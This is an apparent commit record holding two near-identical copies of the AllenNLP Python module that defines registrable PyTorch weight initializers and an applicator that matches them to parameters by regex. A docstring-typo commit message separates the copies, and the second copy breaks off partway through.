# CombinedText stringlengths 4 3.42M |
# |---|
"""
An initializer is just a PyTorch function.
Here we implement a proxy class that allows us
to register them and supply any additional function arguments
(for example, the `mean` and `std` of a normal initializer)
as named arguments to the constructor.
The available initialization functions are
* ["normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.normal_)
* ["uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.uniform_)
* ["constant"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.constant_)
* ["eye"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.eye_)
* ["dirac"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.dirac_)
* ["xavier_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_uniform_)
* ["xavier_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_normal_)
* ["kaiming_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_uniform_)
* ["kaiming_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_normal_)
* ["orthogonal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.orthogonal_)
* ["sparse"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.sparse_)
* ["block_orthogonal"](./initializers.md#block_orthogonal)
* ["uniform_unit_scaling"](./initializers.md#uniform_unit_scaling)
* ["pretrained"](./initializers.md#PretrainedModelInitializer)
"""
import logging
import re
import math
from typing import Callable, List, Tuple, Dict
import itertools
from overrides import overrides
import torch
import torch.nn.init
from allennlp.common import FromParams, Registrable
from allennlp.common.checks import ConfigurationError
logger = logging.getLogger(__name__)
class Initializer(Registrable):
    """
    A thin `Registrable` proxy around a bare PyTorch initialization function,
    letting initializers be selected and configured by name from configuration.
    """

    # Name used when no explicit initializer type is configured.
    default_implementation = "normal"

    def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
        """
        Declares the call signature every initializer follows, mostly for the
        benefit of mypy; the builtin pytorch initialization functions already
        match it without subclassing. Concrete subclasses must override this.
        """
        raise NotImplementedError
def uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = "linear"):
    """
    An initaliser which preserves output variance for approximately gaussian
    distributed inputs. This boils down to initialising layers using a uniform
    distribution in the range `(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)`, where
    `dim[0]` is equal to the input dimension of the parameter and the `scale`
    is a constant scaling factor which depends on the non-linearity used.

    See `Random Walk Initialisation for Training Very Deep Feedforward Networks
    <https://www.semanticscholar.org/paper/Random-Walk-Initialization-for-Training-Very-Deep-Sussillo-Abbott/be9728a0728b6acf7a485225b1e41592176eda0b>`_
    for more information.

    # Parameters

    tensor : `torch.Tensor`, required.
        The tensor to initialise.
    nonlinearity : `str`, optional (default = "linear")
        The non-linearity which is performed after the projection that this
        tensor is involved in. This must be the name of a function contained
        in the `torch.nn.functional` package.

    # Returns

    The initialised tensor.
    """
    size = 1.0
    # Estimate the input size. This won't work perfectly,
    # but it covers almost all use cases where this initialiser
    # would be expected to be useful, i.e in large linear and
    # convolutional layers, as the last dimension will almost
    # always be the output size.
    for dimension in list(tensor.size())[:-1]:
        size *= dimension

    # `calculate_gain`'s second argument is an optional *number* (the negative
    # slope for leaky_relu); passing the tensor itself raised a ValueError for
    # any nonlinearity that inspects that parameter.
    activation_scaling = torch.nn.init.calculate_gain(nonlinearity)
    max_value = math.sqrt(3 / size) * activation_scaling

    return tensor.data.uniform_(-max_value, max_value)
def block_orthogonal(tensor: torch.Tensor, split_sizes: List[int], gain: float = 1.0) -> None:
    """
    Initializes a parameter tensor in independent "blocks". This is useful for
    recurrent models whose gates are stored concatenated in one parameter for
    efficiency, but should each receive their own orthogonal initialization.

    # Parameters

    tensor : `torch.Tensor`, required.
        A tensor to initialize.
    split_sizes : List[int], required.
        A list of length `tensor.ndim()` specifying the size of the
        blocks along that particular dimension. E.g. `[10, 20]` would
        result in the tensor being split into chunks of size 10 along the
        first dimension and 20 along the second.
    gain : float, optional (default = 1.0)
        The gain (scaling) applied to the orthogonal initialization.
    """
    data = tensor.data
    sizes = list(tensor.size())
    for dim_size, block_size in zip(sizes, split_sizes):
        if dim_size % block_size != 0:
            raise ConfigurationError(
                "tensor dimensions must be divisible by their respective "
                "split_sizes. Found size: {} and split_sizes: {}".format(sizes, split_sizes)
            )
    # All block start offsets along each dimension.
    start_indexes = [
        list(range(0, dim_size, block_size))
        for dim_size, block_size in zip(sizes, split_sizes)
    ]
    # Visit every block (the cartesian product of per-dimension offsets) and
    # initialize it orthogonally in place. The slice tuple selects
    # tensor[start : start + block_size, ...] for every dimension at once.
    for starts in itertools.product(*start_indexes):
        block = tuple(
            slice(start, start + length) for start, length in zip(starts, split_sizes)
        )
        data[block] = torch.nn.init.orthogonal_(tensor[block].contiguous(), gain=gain)
def zero(tensor: torch.Tensor) -> None:
    """Fills the given tensor's data with zeros, in place."""
    return tensor.data.fill_(0.0)
def lstm_hidden_bias(tensor: torch.Tensor) -> None:
    """
    Initialize the biases of the forget gate to 1, and all other gates to 0,
    following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures
    """
    # PyTorch packs the LSTM bias as (b_hi|b_hf|b_hg|b_ho), each of length
    # hidden_size; the forget gate occupies the second quarter.
    data = tensor.data
    data.fill_(0.0)
    hidden_size = tensor.shape[0] // 4
    data[hidden_size : 2 * hidden_size] = 1.0
class _InitializerWrapper(Initializer):
    """
    Adapts a plain initialization function into an `Initializer`, capturing any
    extra keyword arguments at construction time and re-applying them on every call.
    """

    def __init__(self, init_function: Callable[..., None], **kwargs):
        self._init_function = init_function
        self._kwargs = kwargs

    def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
        # Call-time kwargs (e.g. `parameter_name`) are intentionally ignored;
        # only the constructor-supplied arguments are forwarded.
        self._init_function(tensor, **self._kwargs)

    def __repr__(self):
        return "Init: {}, with params: {}".format(self._init_function, self._kwargs)
@Initializer.register("normal")
class NormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.normal_`. Registered as an `Initializer` with name "normal".
    """

    def __init__(self, mean: float = 0.0, std: float = 0.1):
        super().__init__(init_function=torch.nn.init.normal_, mean=mean, std=std)


@Initializer.register("orthogonal")
class OrthogonalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.orthogonal_`. Registered as an `Initializer` with name "orthogonal".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.orthogonal_, gain=gain)


@Initializer.register("uniform")
class UniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.uniform_`. Registered as an `Initializer` with name "uniform".
    """

    def __init__(self, a: float = 0.0, b: float = 1.0):
        super().__init__(init_function=torch.nn.init.uniform_, a=a, b=b)


@Initializer.register("constant")
class ConstantInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.constant_`. Registered as an `Initializer` with name "constant".
    """

    def __init__(self, val: float):
        super().__init__(init_function=torch.nn.init.constant_, val=val)


@Initializer.register("dirac")
class DiracInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.dirac_`. Registered as an `Initializer` with name "dirac".
    """

    def __init__(self):
        super().__init__(init_function=torch.nn.init.dirac_)


@Initializer.register("xavier_uniform")
class XavierUniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.xavier_uniform_`. Registered as an `Initializer` with name
    "xavier_uniform".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.xavier_uniform_, gain=gain)


@Initializer.register("xavier_normal")
class XavierNormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.xavier_normal_`. Registered as an `Initializer` with name "xavier_normal".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.xavier_normal_, gain=gain)


@Initializer.register("kaiming_uniform")
class KaimingUniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.kaiming_uniform_`. Registered as an `Initializer` with name
    "kaiming_uniform".
    """

    def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
        super().__init__(
            init_function=torch.nn.init.kaiming_uniform_, a=a, mode=mode, nonlinearity=nonlinearity
        )


@Initializer.register("kaiming_normal")
class KaimingNormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.kaiming_normal_`. Registered as an `Initializer` with name
    "kaiming_normal".
    """

    def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
        super().__init__(
            init_function=torch.nn.init.kaiming_normal_, a=a, mode=mode, nonlinearity=nonlinearity
        )


@Initializer.register("sparse")
class SparseInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.sparse_`. Registered as an `Initializer` with name "sparse".
    """

    def __init__(self, sparsity: float, std: float = 0.01):
        super().__init__(init_function=torch.nn.init.sparse_, sparsity=sparsity, std=std)


@Initializer.register("eye")
class EyeInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.eye_`. Registered as an `Initializer` with name "eye".
    """

    def __init__(self):
        super().__init__(init_function=torch.nn.init.eye_)


@Initializer.register("block_orthogonal")
class BlockOrthogonalInitializer(_InitializerWrapper):
    """
    Wraps `block_orthogonal`. Registered as an `Initializer` with name "block_orthogonal".
    """

    def __init__(self, split_sizes: List[int], gain: float = 1.0):
        super().__init__(init_function=block_orthogonal, split_sizes=split_sizes, gain=gain)


@Initializer.register("uniform_unit_scaling")
class UniformUnitScalingInitializer(_InitializerWrapper):
    """
    Wraps `uniform_unit_scaling`. Registered as an `Initializer` with name "uniform_unit_scaling".
    """

    def __init__(self, nonlinearity: str = "linear"):
        super().__init__(init_function=uniform_unit_scaling, nonlinearity=nonlinearity)


@Initializer.register("zero")
class ZeroInitializer(_InitializerWrapper):
    """
    Wraps `zero`. Registered as an `Initializer` with name "zero".
    """

    def __init__(self):
        super().__init__(init_function=zero)


@Initializer.register("lstm_hidden_bias")
class LstmHiddenBiasInitializer(_InitializerWrapper):
    """
    Wraps `lstm_hidden_bias`. Registered as an `Initializer` with name "lstm_hidden_bias".
    """

    def __init__(self):
        super().__init__(init_function=lstm_hidden_bias)
@Initializer.register("pretrained")
class PretrainedModelInitializer(Initializer):
    """
    An initializer which allows initializing parameters using a pretrained model. The
    initializer will load all of the weights from the `weights_file_path` and use the
    name of the new parameters to index into the pretrained parameters. Therefore,
    by default, the names of the new and pretrained parameters must be the same.
    However, this behavior can be overridden using the `parameter_name_overrides`,
    which remaps the name of the new parameter to the key which should be used
    to index into the pretrained parameters.

    The initializer will load all of the weights from the `weights_file_path`
    regardless of which parameters will actually be used to initialize the new model.
    So, if you need to initialize several parameters using a pretrained model, the most
    memory-efficient way to do this is to use one `PretrainedModelInitializer` per
    weights file and use a regex to match all of the new parameters which need to be
    initialized.

    If you are using a configuration file to instantiate this object, the below entry
    in the `InitializerApplicator` parameters will initialize `linear_1.weight` and
    `linear_2.weight` using a pretrained model. `linear_1.weight` will be initialized
    to the pretrained parameters called `linear_1.weight`, but `linear_2.weight` will
    be initialized to the pretrained parameters called `linear_3.weight`:

    ```
    ["linear_1.weight|linear_2.weight",
        {
            "type": "pretrained",
            "weights_file_path": "best.th",
            "parameter_name_overrides": {
                "linear_2.weight": "linear_3.weight"
            }
        }
    ]
    ```

    To initialize weights for all the parameters from a pretrained model (assuming their names
    remain unchanged), use the following instead:

    ```
    [".*",
        {
            "type": "pretrained",
            "weights_file_path": "best.th",
            "parameter_name_overrides": {}
        }
    ]
    ```

    Registered as an `Initializer` with name "pretrained".

    # Parameters

    weights_file_path : `str`, required
        The path to the weights file which has the pretrained model parameters.
    parameter_name_overrides : `Dict[str, str]`, optional (default = None)
        The mapping from the new parameter name to the name which should be used
        to index into the pretrained model parameters. If a parameter name is not
        specified, the initializer will use the parameter's default name as the key.
    """

    def __init__(
        self, weights_file_path: str, parameter_name_overrides: Dict[str, str] = None
    ) -> None:
        # Load onto the CPU so that weights saved from a GPU run can still be
        # used to initialize a model on a machine without (or with different) GPUs.
        self.weights: Dict[str, torch.Tensor] = torch.load(weights_file_path, map_location="cpu")
        self.parameter_name_overrides = parameter_name_overrides or {}

    @overrides
    def __call__(self, tensor: torch.Tensor, parameter_name: str, **kwargs) -> None:  # type: ignore
        # Select the pretrained key for this parameter if it's being overridden.
        if parameter_name in self.parameter_name_overrides:
            parameter_name = self.parameter_name_overrides[parameter_name]

        # The source and destination must have exactly the same shape;
        # otherwise the copy below would fail or silently broadcast.
        source_weights = self.weights[parameter_name]
        if tensor.data.size() != source_weights.size():
            raise ConfigurationError(
                "Incompatible sizes found for parameter %s. "
                "Found %s and %s" % (parameter_name, tensor.data.size(), source_weights.size())
            )

        # Copy the parameters from the source to the destination.
        tensor.data[:] = source_weights[:]
class InitializerApplicator(FromParams):
    """
    Applies initializers to the parameters of a Module based on regex matches. Any parameter not
    explicitly matching a regex will not be initialized, instead using whatever the default
    initialization was in the module's code.

    If you are instantiating this object from a config file, an example configuration is as
    follows:

    ```json
    {
        "regexes": [
            ["parameter_regex_match1",
                {
                    "type": "normal",
                    "mean": 0.01,
                    "std": 0.1
                }
            ],
            ["parameter_regex_match2", "uniform"]
        ],
        "prevent_regexes": ["prevent_init_regex"]
    }
    ```

    where the first item in each tuple under the `regexes` parameters is the regex that matches to
    parameters, and the second item specifies an `Initializer.` These values can either be strings,
    in which case they correspond to the names of initializers, or dictionaries, in which case they
    must contain the "type" key, corresponding to the name of an initializer. In addition, they may
    contain auxiliary named parameters which will be fed to the initializer itself. To determine
    valid auxiliary parameters, please refer to the torch.nn.init documentation.

    # Parameters

    regexes : `List[Tuple[str, Initializer]]`, optional (default = [])
        A list mapping parameter regexes to initializers. We will check each parameter against
        each regex in turn, and apply the initializer paired with the first matching regex, if
        any.
    prevent_regexes: `List[str]`, optional (default=None)
        Any parameter name matching one of these regexes will not be initialized, regardless of
        whether it matches one of the regexes passed in the `regexes` parameter.
    """

    def __init__(
        self, regexes: List[Tuple[str, Initializer]] = None, prevent_regexes: List[str] = None
    ) -> None:
        self._initializers = regexes or []
        self._prevent_regex = None
        if prevent_regexes:
            # One alternation that matches iff any of the prevent regexes matches.
            self._prevent_regex = "(" + ")|(".join(prevent_regexes) + ")"

    def __call__(self, module: torch.nn.Module) -> None:
        """
        Applies an initializer to all parameters in a module that match one of the regexes we were
        given in this object's constructor. Does nothing to parameters that do not match.

        # Parameters

        module : torch.nn.Module, required.
            The Pytorch module to apply the initializers to.
        """
        logger.info("Initializing parameters")
        unused_regexes = {initializer[0] for initializer in self._initializers}
        uninitialized_parameters = set()
        # Store which initialisers were applied to which parameters.
        for name, parameter in module.named_parameters():
            # Whether this parameter may be initialized at all depends only on
            # its name, so compute it once instead of once per initializer.
            allow = self._prevent_regex is None or not bool(re.search(self._prevent_regex, name))
            for initializer_regex, initializer in self._initializers:
                if allow and re.search(initializer_regex, name):
                    logger.info("Initializing %s using %s initializer", name, initializer_regex)
                    initializer(parameter, parameter_name=name)
                    unused_regexes.discard(initializer_regex)
                    break
            else:  # no break
                uninitialized_parameters.add(name)
        for regex in unused_regexes:
            logger.warning("Did not use initialization regex that was passed: %s", regex)
        logger.info(
            "Done initializing parameters; the following parameters are using their "
            "default initialization from their code"
        )
        uninitialized_parameter_list = list(uninitialized_parameters)
        uninitialized_parameter_list.sort()
        for name in uninitialized_parameter_list:
            logger.info(" %s", name)
# Fix typo in `InitializerApplicator` docstring (#4100)
"""
An initializer is just a PyTorch function.
Here we implement a proxy class that allows us
to register them and supply any additional function arguments
(for example, the `mean` and `std` of a normal initializer)
as named arguments to the constructor.
The available initialization functions are
* ["normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.normal_)
* ["uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.uniform_)
* ["constant"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.constant_)
* ["eye"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.eye_)
* ["dirac"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.dirac_)
* ["xavier_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_uniform_)
* ["xavier_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.xavier_normal_)
* ["kaiming_uniform"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_uniform_)
* ["kaiming_normal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.kaiming_normal_)
* ["orthogonal"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.orthogonal_)
* ["sparse"](https://pytorch.org/docs/master/nn.html?highlight=orthogonal#torch.nn.init.sparse_)
* ["block_orthogonal"](./initializers.md#block_orthogonal)
* ["uniform_unit_scaling"](./initializers.md#uniform_unit_scaling)
* ["pretrained"](./initializers.md#PretrainedModelInitializer)
"""
import logging
import re
import math
from typing import Callable, List, Tuple, Dict
import itertools
from overrides import overrides
import torch
import torch.nn.init
from allennlp.common import FromParams, Registrable
from allennlp.common.checks import ConfigurationError
logger = logging.getLogger(__name__)
class Initializer(Registrable):
    """
    A thin `Registrable` proxy around a bare PyTorch initialization function,
    letting initializers be selected and configured by name from configuration.
    """

    # Name used when no explicit initializer type is configured.
    default_implementation = "normal"

    def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
        """
        Declares the call signature every initializer follows, mostly for the
        benefit of mypy; the builtin pytorch initialization functions already
        match it without subclassing. Concrete subclasses must override this.
        """
        raise NotImplementedError
def uniform_unit_scaling(tensor: torch.Tensor, nonlinearity: str = "linear"):
    """
    An initaliser which preserves output variance for approximately gaussian
    distributed inputs. This boils down to initialising layers using a uniform
    distribution in the range `(-sqrt(3/dim[0]) * scale, sqrt(3 / dim[0]) * scale)`, where
    `dim[0]` is equal to the input dimension of the parameter and the `scale`
    is a constant scaling factor which depends on the non-linearity used.

    See `Random Walk Initialisation for Training Very Deep Feedforward Networks
    <https://www.semanticscholar.org/paper/Random-Walk-Initialization-for-Training-Very-Deep-Sussillo-Abbott/be9728a0728b6acf7a485225b1e41592176eda0b>`_
    for more information.

    # Parameters

    tensor : `torch.Tensor`, required.
        The tensor to initialise.
    nonlinearity : `str`, optional (default = "linear")
        The non-linearity which is performed after the projection that this
        tensor is involved in. This must be the name of a function contained
        in the `torch.nn.functional` package.

    # Returns

    The initialised tensor.
    """
    size = 1.0
    # Estimate the input size. This won't work perfectly,
    # but it covers almost all use cases where this initialiser
    # would be expected to be useful, i.e in large linear and
    # convolutional layers, as the last dimension will almost
    # always be the output size.
    for dimension in list(tensor.size())[:-1]:
        size *= dimension

    # `calculate_gain`'s second argument is an optional *number* (the negative
    # slope for leaky_relu); passing the tensor itself raised a ValueError for
    # any nonlinearity that inspects that parameter.
    activation_scaling = torch.nn.init.calculate_gain(nonlinearity)
    max_value = math.sqrt(3 / size) * activation_scaling

    return tensor.data.uniform_(-max_value, max_value)
def block_orthogonal(tensor: torch.Tensor, split_sizes: List[int], gain: float = 1.0) -> None:
    """
    Initializes a parameter tensor in independent "blocks". This is useful for
    recurrent models whose gates are stored concatenated in one parameter for
    efficiency, but should each receive their own orthogonal initialization.

    # Parameters

    tensor : `torch.Tensor`, required.
        A tensor to initialize.
    split_sizes : List[int], required.
        A list of length `tensor.ndim()` specifying the size of the
        blocks along that particular dimension. E.g. `[10, 20]` would
        result in the tensor being split into chunks of size 10 along the
        first dimension and 20 along the second.
    gain : float, optional (default = 1.0)
        The gain (scaling) applied to the orthogonal initialization.
    """
    data = tensor.data
    sizes = list(tensor.size())
    for dim_size, block_size in zip(sizes, split_sizes):
        if dim_size % block_size != 0:
            raise ConfigurationError(
                "tensor dimensions must be divisible by their respective "
                "split_sizes. Found size: {} and split_sizes: {}".format(sizes, split_sizes)
            )
    # All block start offsets along each dimension.
    start_indexes = [
        list(range(0, dim_size, block_size))
        for dim_size, block_size in zip(sizes, split_sizes)
    ]
    # Visit every block (the cartesian product of per-dimension offsets) and
    # initialize it orthogonally in place. The slice tuple selects
    # tensor[start : start + block_size, ...] for every dimension at once.
    for starts in itertools.product(*start_indexes):
        block = tuple(
            slice(start, start + length) for start, length in zip(starts, split_sizes)
        )
        data[block] = torch.nn.init.orthogonal_(tensor[block].contiguous(), gain=gain)
def zero(tensor: torch.Tensor) -> None:
    """Fills the given tensor's data with zeros, in place."""
    return tensor.data.fill_(0.0)
def lstm_hidden_bias(tensor: torch.Tensor) -> None:
    """
    Initialize the biases of the forget gate to 1, and all other gates to 0,
    following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures
    """
    # PyTorch packs the LSTM bias as (b_hi|b_hf|b_hg|b_ho), each of length
    # hidden_size; the forget gate occupies the second quarter.
    data = tensor.data
    data.fill_(0.0)
    hidden_size = tensor.shape[0] // 4
    data[hidden_size : 2 * hidden_size] = 1.0
class _InitializerWrapper(Initializer):
    """
    Adapts a plain initialization function into an `Initializer`, capturing any
    extra keyword arguments at construction time and re-applying them on every call.
    """

    def __init__(self, init_function: Callable[..., None], **kwargs):
        self._init_function = init_function
        self._kwargs = kwargs

    def __call__(self, tensor: torch.Tensor, **kwargs) -> None:
        # Call-time kwargs (e.g. `parameter_name`) are intentionally ignored;
        # only the constructor-supplied arguments are forwarded.
        self._init_function(tensor, **self._kwargs)

    def __repr__(self):
        return "Init: {}, with params: {}".format(self._init_function, self._kwargs)
@Initializer.register("normal")
class NormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.normal_`. Registered as an `Initializer` with name "normal".
    """

    def __init__(self, mean: float = 0.0, std: float = 0.1):
        super().__init__(init_function=torch.nn.init.normal_, mean=mean, std=std)


@Initializer.register("orthogonal")
class OrthogonalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.orthogonal_`. Registered as an `Initializer` with name "orthogonal".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.orthogonal_, gain=gain)


@Initializer.register("uniform")
class UniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.uniform_`. Registered as an `Initializer` with name "uniform".
    """

    def __init__(self, a: float = 0.0, b: float = 1.0):
        super().__init__(init_function=torch.nn.init.uniform_, a=a, b=b)


@Initializer.register("constant")
class ConstantInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.constant_`. Registered as an `Initializer` with name "constant".
    """

    def __init__(self, val: float):
        super().__init__(init_function=torch.nn.init.constant_, val=val)


@Initializer.register("dirac")
class DiracInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.dirac_`. Registered as an `Initializer` with name "dirac".
    """

    def __init__(self):
        super().__init__(init_function=torch.nn.init.dirac_)


@Initializer.register("xavier_uniform")
class XavierUniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.xavier_uniform_`. Registered as an `Initializer` with name
    "xavier_uniform".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.xavier_uniform_, gain=gain)


@Initializer.register("xavier_normal")
class XavierNormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.xavier_normal_`. Registered as an `Initializer` with name "xavier_normal".
    """

    def __init__(self, gain: float = 1.0):
        super().__init__(init_function=torch.nn.init.xavier_normal_, gain=gain)


@Initializer.register("kaiming_uniform")
class KaimingUniformInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.kaiming_uniform_`. Registered as an `Initializer` with name
    "kaiming_uniform".
    """

    def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
        super().__init__(
            init_function=torch.nn.init.kaiming_uniform_, a=a, mode=mode, nonlinearity=nonlinearity
        )


@Initializer.register("kaiming_normal")
class KaimingNormalInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.kaiming_normal_`. Registered as an `Initializer` with name
    "kaiming_normal".
    """

    def __init__(self, a: float = 0.0, mode: str = "fan_in", nonlinearity: str = "leaky_relu"):
        super().__init__(
            init_function=torch.nn.init.kaiming_normal_, a=a, mode=mode, nonlinearity=nonlinearity
        )


@Initializer.register("sparse")
class SparseInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.sparse_`. Registered as an `Initializer` with name "sparse".
    """

    def __init__(self, sparsity: float, std: float = 0.01):
        super().__init__(init_function=torch.nn.init.sparse_, sparsity=sparsity, std=std)


@Initializer.register("eye")
class EyeInitializer(_InitializerWrapper):
    """
    Wraps `torch.nn.init.eye_`. Registered as an `Initializer` with name "eye".
    """

    def __init__(self):
        super().__init__(init_function=torch.nn.init.eye_)


@Initializer.register("block_orthogonal")
class BlockOrthogonalInitializer(_InitializerWrapper):
    """
    Wraps `block_orthogonal`. Registered as an `Initializer` with name "block_orthogonal".
    """

    def __init__(self, split_sizes: List[int], gain: float = 1.0):
        super().__init__(init_function=block_orthogonal, split_sizes=split_sizes, gain=gain)


@Initializer.register("uniform_unit_scaling")
class UniformUnitScalingInitializer(_InitializerWrapper):
    """
    Wraps `uniform_unit_scaling`. Registered as an `Initializer` with name "uniform_unit_scaling".
    """

    def __init__(self, nonlinearity: str = "linear"):
        super().__init__(init_function=uniform_unit_scaling, nonlinearity=nonlinearity)


@Initializer.register("zero")
class ZeroInitializer(_InitializerWrapper):
    """
    Wraps `zero`. Registered as an `Initializer` with name "zero".
    """

    def __init__(self):
        super().__init__(init_function=zero)


@Initializer.register("lstm_hidden_bias")
class LstmHiddenBiasInitializer(_InitializerWrapper):
    """
    Wraps `lstm_hidden_bias`. Registered as an `Initializer` with name "lstm_hidden_bias".
    """

    def __init__(self):
        super().__init__(init_function=lstm_hidden_bias)
@Initializer.register("pretrained")
class PretrainedModelInitializer(Initializer):
    """
    An initializer which allows initializing parameters using a pretrained model. The
    initializer will load all of the weights from the `weights_file_path` and use the
    name of the new parameters to index into the pretrained parameters. Therefore,
    by default, the names of the new and pretrained parameters must be the same.
    However, this behavior can be overridden using the `parameter_name_overrides`,
    which remaps the name of the new parameter to the key which should be used
    to index into the pretrained parameters.

    The initializer will load all of the weights from the `weights_file_path`
    regardless of which parameters will actually be used to initialize the new model.
    So, if you need to initialize several parameters using a pretrained model, the most
    memory-efficient way to do this is to use one `PretrainedModelInitializer` per
    weights file and use a regex to match all of the new parameters which need to be
    initialized.

    If you are using a configuration file to instantiate this object, the below entry
    in the `InitializerApplicator` parameters will initialize `linear_1.weight` and
    `linear_2.weight` using a pretrained model. `linear_1.weight` will be initialized
    to the pretrained parameters called `linear_1.weight`, but `linear_2.weight` will
    be initialized to the pretrained parameters called `linear_3.weight`:

    ```
    ["linear_1.weight|linear_2.weight",
        {
            "type": "pretrained",
            "weights_file_path": "best.th",
            "parameter_name_overrides": {
                "linear_2.weight": "linear_3.weight"
            }
        }
    ]
    ```

    To initialize weights for all the parameters from a pretrained model (assuming their names
    remain unchanged), use the following instead:

    ```
    [".*",
        {
            "type": "pretrained",
            "weights_file_path": "best.th",
            "parameter_name_overrides": {}
        }
    ]
    ```

    Registered as an `Initializer` with name "pretrained".

    # Parameters

    weights_file_path : `str`, required
        The path to the weights file which has the pretrained model parameters.
    parameter_name_overrides : `Dict[str, str]`, optional (default = None)
        The mapping from the new parameter name to the name which should be used
        to index into the pretrained model parameters. If a parameter name is not
        specified, the initializer will use the parameter's default name as the key.
    """

    def __init__(
        self, weights_file_path: str, parameter_name_overrides: Dict[str, str] = None
    ) -> None:
        # Load onto the CPU so that weights saved from a GPU run can still be
        # used to initialize a model on a machine without (or with different) GPUs.
        self.weights: Dict[str, torch.Tensor] = torch.load(weights_file_path, map_location="cpu")
        self.parameter_name_overrides = parameter_name_overrides or {}

    @overrides
    def __call__(self, tensor: torch.Tensor, parameter_name: str, **kwargs) -> None:  # type: ignore
        # Select the pretrained key for this parameter if it's being overridden.
        if parameter_name in self.parameter_name_overrides:
            parameter_name = self.parameter_name_overrides[parameter_name]

        # The source and destination must have exactly the same shape;
        # otherwise the copy below would fail or silently broadcast.
        source_weights = self.weights[parameter_name]
        if tensor.data.size() != source_weights.size():
            raise ConfigurationError(
                "Incompatible sizes found for parameter %s. "
                "Found %s and %s" % (parameter_name, tensor.data.size(), source_weights.size())
            )

        # Copy the parameters from the source to the destination.
        tensor.data[:] = source_weights[:]
class InitializerApplicator(FromParams):
    """
    Applies initializers to the parameters of a Module based on regex matches. Any parameter not
    explicitly matching a regex will not be initialized, instead using whatever the default
    initialization was in the module's code.

    If you are instantiating this object from a config file, an example configuration is as
    follows:

    ```json
    {
        "regexes": [
            ["parameter_regex_match1",
                {
                    "type": "normal"
                    "mean": 0.01
                    "std": 0.1
                }
            ],
            ["parameter_regex_match2", "uniform"]
        ],
        "prevent_regexes": ["prevent_init_regex"]
    }
    ```

    where the first item in each tuple under the `regexes` parameters is the regex that matches to
    parameters, and the second item specifies an `Initializer`. These values can either be strings,
    in which case they correspond to the names of initializers, or dictionaries, in which case they
    must contain the "type" key, corresponding to the name of an initializer. In addition, they may
    contain auxiliary named parameters which will be fed to the initializer itself. To determine
    valid auxiliary parameters, please refer to the torch.nn.init documentation.

    # Parameters

    regexes : `List[Tuple[str, Initializer]]`, optional (default = [])
        A list mapping parameter regexes to initializers. We will check each parameter against
        each regex in turn, and apply the initializer paired with the first matching regex, if
        any.
    prevent_regexes: `List[str]`, optional (default=None)
        Any parameter name matching one of these regexes will not be initialized, regardless of
        whether it matches one of the regexes passed in the `regexes` parameter.
    """

    def __init__(
        self, regexes: List[Tuple[str, Initializer]] = None, prevent_regexes: List[str] = None
    ) -> None:
        self._initializers = regexes or []
